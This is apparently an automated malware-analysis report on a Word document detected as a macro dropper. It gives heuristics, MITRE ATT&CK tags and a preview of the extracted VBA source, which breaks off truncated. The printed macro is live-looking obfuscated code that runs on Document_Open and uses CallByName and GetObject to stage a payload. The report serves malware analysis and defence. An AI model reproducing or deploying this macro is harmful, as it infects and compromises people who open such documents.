MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine, indicative of malicious intent. The macro utilizes CreateObject and CallByName functions, suggesting it attempts to download and execute a second-stage payload. ClamAV detection as 'Doc.Dropper.Agent-6935193-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6935193-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6935193-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 33386 bytes |
SHA-256: 4874d6b53117bca9fc78d50d6efd06da19998dff2dd9f066a06994d3c78f797b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Document_Open()
Module1.pmxv
Module1.wxbl
Module1.eage
End Sub
Attribute VB_Name = "uuuu1"
Attribute VB_Base = "0{6BE93EFA-B396-4689-9A8F-63E11C044147}{7B8A702A-D7CD-4287-9EEC-36B44DF6449A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ttt1_Change()
End Sub
Attribute VB_Name = "Module1"
Function eage()
Set hetx = Application
Set vvtb = CallByName(hetx, eyak("0" & lssa & "341341" & doxx & "34" & vdvk & "1" & cgik & "29" & vdvk & ""), pohk)
CallByName vvtb, eyak("0" & rump & "300" & lssa & "" & pxtq & "" & tqjf & "33" & vdvk & ""), VbMethod, eyak("0" & rump & "30" & wewy & "13" & csvd & "81" & tqjf & "291" & ejlw & "5108813" & cdmi & "31" & cbqh & "33"), eyak("10" & cwlr & "" & cwlr & "00511" & opkp & "30" & wewy & "13" & csvd & "81" & tqjf & "291" & ejlw & "51" & bozr & "1" & tqjf & "3" & cdmi & "41" & doxx & "" & cbqh & "290511" & doxx & "3405" & acdc & "" & lrwf & "01" & ejlw & "51" & wewy & "1" & cbqh & "2813111" & pxev & "" & uqbt & "41" & nrqk & "" & pxtq & "2005" & shjn & "81" & doxx & "3" & uqbt & "305" & shjn & "" & uqbt & "" & cwlr & "413405" & shjn & "81" & cbqh & "33" & qqiw & "05" & shjn & "012" & acdc & "" & acdc & "4" & wewy & "" & dpen & "051" & bozr & "1" & tqjf & "3" & cdmi & "41" & doxx & "" & cbqh & "29"), 0, 1, 0, 0, 0
End Function
Function pmxv()
Dim hetx, vvtb As String
Set bbia = Application
ezuw = CallByName(bbia, eyak("10" & uqbt & "013" & cdmi & "41" & doxx & "" & cbqh & "29"), pohk)
hetx = eyak("" & djwa & "1" & cbqh & "21" & vdvk & "13811" & pxev & "" & cwlr & "011109" & csvd & "4" & wewy & "1" & hbnk & "" & cbqh & "341" & cbqh & "21" & vdvk & "11109812" & acdc & "" & acdc & "4" & wewy & "1" & tqjf & "11") & ezuw & eyak("111088139" & wewy & "1" & tqjf & "" & pxtq & "11" & djwa & "" & dpen & "" & wewy & "13" & pxev & "" & cwlr & "4" & vdvk & "140")
vvtb = eyak("084" & wewy & "" & wewy & "1" & tqjf & "3413410" & ldxy & "5098096")
Set jxpd = liha(eyak("1381" & doxx & "29128122128" & vdvk & "1340771421" & doxx & "2813" & acdc & "013" & cdmi & "41" & cbqh & "2" & ksch & "" & pxev & "" & uqbt & "41" & cbqh & "2909" & uqbt & "0" & bozr & "1" & tqjf & "270801" & doxx & "2813" & acdc & "013" & cdmi & "41" & cbqh & "2" & ksch & "" & pxev & "" & uqbt & "014405211111" & jaic & "511" & shjn & "31" & cbqh & "30" & vdvk & "1111" & opkp & "" & tqjf & "2111" & pxev & "61" & pxtq & "" & ejlw & "77" & djwa & "" & vdvk & "1" & opkp & "0" & acdc & "012209" & lrwf & "3" & lvzg & "" & bozr & ""))
CallByName jxpd, eyak("" & djwa & "1" & tqjf & "" & ejlw & "" & rump & "06098101087" & dpwa & "1" & cgik & "" & pxtq & "3" & csvd & "0"), VbMethod, &H80000001, hetx, vvtb, 1
End Function
Function liha(hetx As String) As Object
Set liha = GetObject(hetx)
End Function
Function eyak(vvtb As String) As String
Dim hetx As String
hetx = ""
Do
hetx = hetx + ocfg(yyor(vvtb))
vvtb = omss(vvtb)
Loop While Len(vvtb) > 0
eyak = hetx
End Function
Function ocfg(vvtb)
ocfg = Chr(vvtb - 19)
End Function
Function yyor(vvtb)
yyor = Left(vvtb, 3)
End Function
Function omss(vvtb)
omss = Right(vvtb, Len(vvtb) - 3)
End Function
Function wxbl()
Do While True
On Error GoTo Handler
Dim hetx, vvtb As Object
Set hetx = ocag(eyak("0" & "8" & "8" & "1" & "3" & "9" & wewy & "1" & tqjf & "2" & "7" & "0" & "6" & ldxy & "4" & "1" & "3" & shjn & "" & acdc & "" & emas & "4" & wewy & "1" & "1" & pxev & "" & uqbt & "4" & "1" & cbqh & "2" & "9"))
CallByName hetx, eyak("1" & "0" &
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.